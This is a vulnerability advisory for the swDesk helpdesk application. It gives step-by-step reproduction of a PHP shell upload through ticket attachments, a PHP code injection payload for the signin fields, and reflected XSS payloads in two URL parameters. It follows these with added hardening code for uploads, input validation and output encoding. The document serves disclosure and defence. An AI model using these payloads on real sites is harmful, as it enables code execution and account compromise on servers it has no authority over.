Multiple swDesk Defects
Written by Red Security TEAM www.2cto.com
Developer: http://www.swdesk.com/
Test Platform: Apache
Test:
#
# I. upload any file
#1. Go to http://www.bkjia.com/create_ticket.php
#2. Fill in all input fields and click on Submit Ticket
#3. Click on View Ticket and you should land on a link like: http://www.bkjia.com/view_ticket.php?email=[Your Email]&id=1
#4. You see the Send Message box; write anything there, attach your PHP file in Upload attachment and click on Send Message
#5. You can see your attachment above, like: Attachment: shell.php. Click on it and you see your PHP code has been run ;)
#
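The root cause in section I is that a user-chosen file name is written into a web-served directory where Apache hands .php files to the interpreter. The following is an added example of a hardened attachment handler, written for this advisory and not taken from swDesk; the directory path, the form field name `attachment`, the download script name and the allowlist are assumptions.

```php
<?php
// Added example (not swDesk code): store a ticket attachment so that it can never execute.
// Assumptions: the upload arrives as $_FILES['attachment'], ATTACHMENT_DIR lies outside
// the Apache DocumentRoot, and files are served only through send_attachment().

const ATTACHMENT_DIR = '/var/swdesk_data/attachments'; // assumed path, not web-served
const MAX_BYTES      = 5 * 1024 * 1024;

// Allowlist of extension => expected MIME type. Anything not listed (php, phtml, phar,
// htaccess, ...) is rejected; a denylist of script extensions is the wrong way round.
const ALLOWED = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
];

function store_attachment(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('attachment too large');
    }
    // Only the last extension counts, and it must be on the allowlist.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // Check the bytes as well as the name: a script renamed to .png fails here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // The server picks the on-disk name; the user-supplied name never touches the filesystem.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = ATTACHMENT_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640); // readable by the web user, not executable
    return $stored;     // persist this token with the ticket message
}

// download.php (assumed name): serve by stored token, never by a caller-supplied path,
// and force a download so the browser does not render or sniff the content.
function send_attachment(string $stored): void
{
    if (!preg_match('/^[0-9a-f]{32}\.[a-z]+$/', $stored)) {
        http_response_code(400);
        return;
    }
    $path = ATTACHMENT_DIR . '/' . $stored;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="attachment"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}
```

As defence in depth on the Apache test platform, the attachment directory (if it must stay under the DocumentRoot) should additionally have PHP switched off for it, for example with `php_admin_flag engine off` inside a `<Directory>` block for that path, so that a file which slips past the allowlist is still served as plain bytes rather than executed.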
# II. PHP code injection
#1. Go to http://www.bkjia.com/signin.php; vulnerable input fields: email, password
#2. Write your PHP in the input fields, like: phpi ${@print(RedSecurityTEAM)}
#
# III. XSS Defects
#1. http://www.bkjia.com/view_ticket.php?email=example@example.com&id="onmouseover=alert(1) bad="
#2. http://www.bkjia.com/kb_search.php?keywords="onmouseover=alert(1) bad="&mode=Search
Fix suggestion from www.2cto.com:
Targeted filtering and verification.
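The "targeted filtering and verification" above applies to sections II and III as follows: a `${...}` payload only runs when the submitted value ends up inside code that PHP evaluates (a double-quoted string passed to eval or similar), and the reflected `"onmouseover=...` values fire only because view_ticket.php and kb_search.php echo the parameters back unencoded. The example below is added for this advisory and is not swDesk's code; it assumes a PDO connection `$pdo`, a `users` table with an `email` and a `password_hash` column, and the parameter names `email`, `id` and `keywords` seen in the URLs.

```php
<?php
// Added example (not swDesk code): validate signin and ticket/search parameters, bind
// them as query parameters, and encode them on output. Nothing here is ever evaluated.

function validated_email(string $raw): ?string
{
    // Rejects anything that is not syntactically an address, including ${...} payloads.
    $email = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

function validated_id(string $raw): ?int
{
    // The ticket id is a positive integer; the quoted onmouseover value fails here.
    return ($raw !== '' && ctype_digit($raw)) ? (int) $raw : null;
}

function h(string $s): string
{
    // Output encoding for HTML text and quoted attribute contexts; ENT_QUOTES also
    // encodes the double quote that the section III payloads rely on.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// signin.php: the submitted values are bound as parameters, never interpolated into
// code or SQL, and the password is compared with password_verify().
function signin(PDO $pdo, string $email_raw, string $password_raw): bool
{
    $email = validated_email($email_raw);
    if ($email === null) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE email = ?');
    $stmt->execute([$email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password_raw, $row['password_hash']);
}

// view_ticket.php: load the ticket only with a validated id and matching email.
function load_ticket(PDO $pdo, string $email_raw, string $id_raw): ?array
{
    $email = validated_email($email_raw);
    $id    = validated_id($id_raw);
    if ($email === null || $id === null) {
        http_response_code(400);
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM tickets WHERE id = ? AND email = ?'); // assumed schema
    $stmt->execute([$id, $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// kb_search.php: reflect the search term only through h(), inside a quoted attribute.
function render_search_box(string $keywords_raw): string
{
    return '<input type="text" name="keywords" value="' . h($keywords_raw) . '">';
}

// Where a field is rendered in the page body rather than an attribute, the same h()
// call applies; a global filter is not a substitute for encoding at each output point.
function render_ticket_email(array $ticket): string
{
    return '<p>Ticket for ' . h($ticket['email']) . '</p>';
}
```

The `id` check is deliberately stricter than "filter quotes": a ticket id that is not all digits is refused before it reaches the database or the page, which closes the reflected-parameter issue for that field regardless of what characters a future payload uses.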